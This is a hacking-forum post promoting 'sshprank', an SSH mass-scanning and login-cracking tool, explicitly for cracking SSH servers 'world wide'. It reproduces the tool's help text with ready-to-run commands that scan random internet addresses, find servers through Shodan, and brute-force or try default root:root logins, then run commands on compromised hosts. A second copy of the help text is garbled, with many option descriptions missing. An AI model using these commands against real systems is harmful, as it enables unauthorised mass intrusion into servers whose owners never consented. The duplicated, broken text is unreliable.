Fast SSH Mass-Scanner 05-05-2020, 09:49 PM
#1
for who waiting long time for mass or bot cracking ssh world wide enjoy ;D very HQ tools for me <3
A fast SSH mass-scanner, login cracker and banner grabber tool using the python-masscan and shodan module.
https://github.com/noptrix/sshprank
[ hacker@BlackArch ~ ]$ sshprank -H
__ __
__________/ /_ ____ _________ _____ / /__
/ ___/ ___/ __ \/ __ \/ ___/ __ `/ __ \/ //_/
(__ |__ ) / / / /_/ / / / /_/ / / / / ,<
/____/____/_/ /_/ .___/_/ \__,_/_/ /_/_/|_|
/_/
--== [ by nullsecurity.net ] ==--
usage
sshprank [opts] |
modes
-h - single host to crack. multiple ports can be seperated
by comma, e.g.: 22,2022,22222 (default port: 22)
-l - list of hosts to crack. format: [:ports]. multiple
ports can be seperated by comma (default port: 22)
-m [-r ] - pass arbitrary masscan opts, portscan given hosts and
crack for logins. found sshd services will be saved to
'sshds.txt' in supported format for '-l' option and
even for '-b'. use '-r' for generating random ipv4
addresses rather than scanning given hosts. these
options are always on: '-sS -oX - --open'.
NOTE: if you intent to use the '--banner' option then
you need to specify '--source-ip' which
is needed by masscan. better check masscan options!
-s - search ssh servers using shodan and crack logins.
see examples below. note: you need a better API key
than this one i offer in order to search more than 100
(= 1 page) ssh servers. so if you use this one use
'1' for 'page'. don't bother me with this, bitch
-b - list of hosts to grab sshd banner from
format:[:ports]. multiple ports can be
seperated by comma (default port: 22)
options
-r - generate random ipv4 addresses, check for open
sshd port and crack for login (only with -m option!)
-c - execute this on host if login was cracked
-u - single username (default: root)
-U - list of usernames
-p - single password (default: root)
-P - list of passwords
-C - list of user:pass combination
-x - num threads for parallel host crack (default: 20)
-S - num threads for parallel service crack (default: 20)
-X - num threads for parallel login crack (default: 20)
-B - num threads for parallel banner grabbing (default: 70)
-T - num sec for connect timeout (default: 2s)
-R - num sec for (banner) read timeout (default: 2s)
-o - write found logins to file. format:
::: (default: owned.txt)
-e - exit after first login was found. continue with other
hosts instead (default: off)
-v - verbose mode. show found logins, sshds, etc.
(default: off)
misc
-H - print help
-V - print version information
examples
# crack targets from a given list with user admin, pw-list and 20 host-threads
$ ./sshprank -l sshds.txt -u admin -P /tmp/passlist.txt -x 20
# first scan then crack from founds ssh services
$ sudo ./sshprank -m '-p22,2022 --rate 5000 --source-ip 192.168.13.37 \
--range 192.168.13.1/24'
# generate 1k random ipv4 addresses, then port-scan (tcp/22 here) with 1k p/s
# and crack login 'root:root' on found sshds
$ sudo ./sshprank -m '-p22 --rate=1000' -r 1000 -v
# search 50 ssh servers via shodan and crack logins using 'root:root' against
# found sshds
$ sudo ./sshprank -s 'SSH:1:50'
# grab banners and output to file with format supported for '-l' option
$ ./sshprank -b hosts.txt > sshds2.txt
A fast SSH mass-scanner, login cracker and banner grabber tool using the python-masscan and shodan module.
https://github.com/noptrix/sshprank
[ hacker@BlackArch ~ ]$ sshprank -H
__ __
__________/ /_ ____ _________ _____ / /__
/ ___/ ___/ __ \/ __ \/ ___/ __ `/ __ \/ //_/
(__ |__ ) / / / /_/ / / / /_/ / / / / ,<
/____/____/_/ /_/ .___/_/ \__,_/_/ /_/_/|_|
/_/
--== [ by nullsecurity.net ] ==--
usage
sshprank
modes
-h
by comma, e.g.: 22,2022,22222 (default port: 22)
-l
ports can be seperated by comma (default port: 22)
-m
crack for logins. found sshd services will be saved to
'sshds.txt' in supported format for '-l' option and
even for '-b'. use '-r' for generating random ipv4
addresses rather than scanning given hosts. these
options are always on: '-sS -oX - --open'.
NOTE: if you intent to use the '--banner' option then
you need to specify '--source-ip
is needed by masscan. better check masscan options!
-s
see examples below. note: you need a better API key
than this one i offer in order to search more than 100
(= 1 page) ssh servers. so if you use this one use
'1' for 'page'. don't bother me with this, bitch
-b
format:
seperated by comma (default port: 22)
options
-r
sshd port and crack for login (only with -m option!)
-c
-u
-U
-p - single password (default: root)
-P
-C
-x
-S
-X
-B
-T
-R
-o
-e - exit after first login was found. continue with other
hosts instead (default: off)
-v - verbose mode. show found logins, sshds, etc.
(default: off)
misc
-H - print help
-V - print version information
examples
# crack targets from a given list with user admin, pw-list and 20 host-threads
$ ./sshprank -l sshds.txt -u admin -P /tmp/passlist.txt -x 20
# first scan then crack from founds ssh services
$ sudo ./sshprank -m '-p22,2022 --rate 5000 --source-ip 192.168.13.37 \
--range 192.168.13.1/24'
# generate 1k random ipv4 addresses, then port-scan (tcp/22 here) with 1k p/s
# and crack login 'root:root' on found sshds
$ sudo ./sshprank -m '-p22 --rate=1000' -r 1000 -v
# search 50 ssh servers via shodan and crack logins using 'root:root' against
# found sshds
$ sudo ./sshprank -s 'SSH:1:50'
# grab banners and output to file with format supported for '-l' option
$ ./sshprank -b hosts.txt > sshds2.txt